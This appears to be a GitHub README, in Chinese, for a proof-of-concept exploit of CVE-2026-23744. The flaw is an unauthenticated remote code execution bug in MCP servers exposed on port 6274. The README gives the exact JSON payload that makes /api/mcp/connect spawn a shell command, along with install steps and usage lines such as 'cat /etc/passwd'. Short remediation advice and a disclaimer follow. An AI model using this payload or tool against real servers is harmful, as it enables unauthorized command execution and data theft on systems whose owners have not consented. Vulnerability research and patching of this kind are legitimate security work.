d3vn0mi/CVE-2026-23744-POC

GitHub: d3vn0mi/CVE-2026-23744-POC

针对 CVE-2026-23744 的概念验证工具,用于验证 MCP 服务器未认证远程代码执行漏洞。

Stars: 0 | Forks: 0

# CVE-2026-23744 — MCP Server 未认证 RCE ## 概述 **CVE-2026-23744** 是暴露在端口 `6274` 上的 MCP 兼容服务器中的一个未认证远程代码执行 (RCE) 漏洞。`/api/mcp/connect` 端点接受一个 `serverConfig` 对象,该对象允许调用者指定任意的 OS 命令和参数——而无需任何身份验证或授权检查。 拥有该服务网络访问权限的攻击者可以以运行 MCP 服务器的用户身份执行任意命令。 | 详情 | 值 | | ------------- | -------------------------------------- | | **CVE ID** | CVE-2026-23744 | | **类型** | 未认证远程代码执行 | | **端点** | `POST /api/mcp/connect` | | **端口** | 6274 (默认) | | **严重程度** | 严重 | ## 漏洞 Payload ``` { "serverConfig": { "command": "sh", "args": ["-c", ""], "env": {} }, "serverId": "anything" } ``` 服务器在未经任何过滤或访问控制的情况下,使用给定的 `args` 生成所提供的 `command`。 ## 安装 ``` git clone https://github.com/d3vn0mi/CVE-2026-23744-POC.git cd CVE-2026-23744-POC pip install -r requirements.txt ``` ## 用法 ``` # 基本用法 python3 exploit.py -t -c '' # 自定义端口 python3 exploit.py -t 192.168.1.10 -p 6274 -c 'id > /tmp/pwned.txt' # 跳过可达性检查 python3 exploit.py -t 10.0.0.5 -c 'whoami' --no-check # 自定义 server ID python3 exploit.py -t 127.0.0.1 -c 'cat /etc/passwd' -s my_server ``` ### 选项 | 标志 | 描述 | | ----------------- | -------------------------------------------- | | `-t`, `--target` | 目标 IP 或主机名 *(必填)* | | `-c`, `--command` | 要执行的 OS 命令 *(必填)* | | `-p`, `--port` | 目标端口 (默认: `6274`) | | `-s`, `--server-id` | Payload 中的 `serverId` 值 | | `--timeout` | 探测超时时间(秒) (默认: `30`) | | `--no-check` | 跳过初始可达性检查 | ## 修复建议 - **不要**将 MCP 服务器暴露给不可信网络。 - 尽快应用供应商补丁。 - 通过身份验证和网络级控制限制对 `/api/mcp/connect` 端点的访问。 - 监控 MCP 服务器进程产生的意外进程生成。 ## 免责声明 本工具仅供**授权的安全测试和教育目的**使用。未经授权访问计算机系统是非法的。作者不对滥用行为承担任何责任。在测试前请务必获取适当的授权。 ## 许可证 本项目基于 [MIT 许可证](LICENSE) 授权。 ## 作者 **d3vn0mi** — [github.com/d3vn0mi](https://github.com/d3vn0mi)
标签:CISA项目, CVE-2026-23744, Maven, MCP Server, POC, Python, RCE, 事件响应, 命令注入, 无后门, 未授权访问, 漏洞验证, 端口6274, 编程工具, 网络安全, 远程代码执行, 逆向工具, 隐私保护, 高危漏洞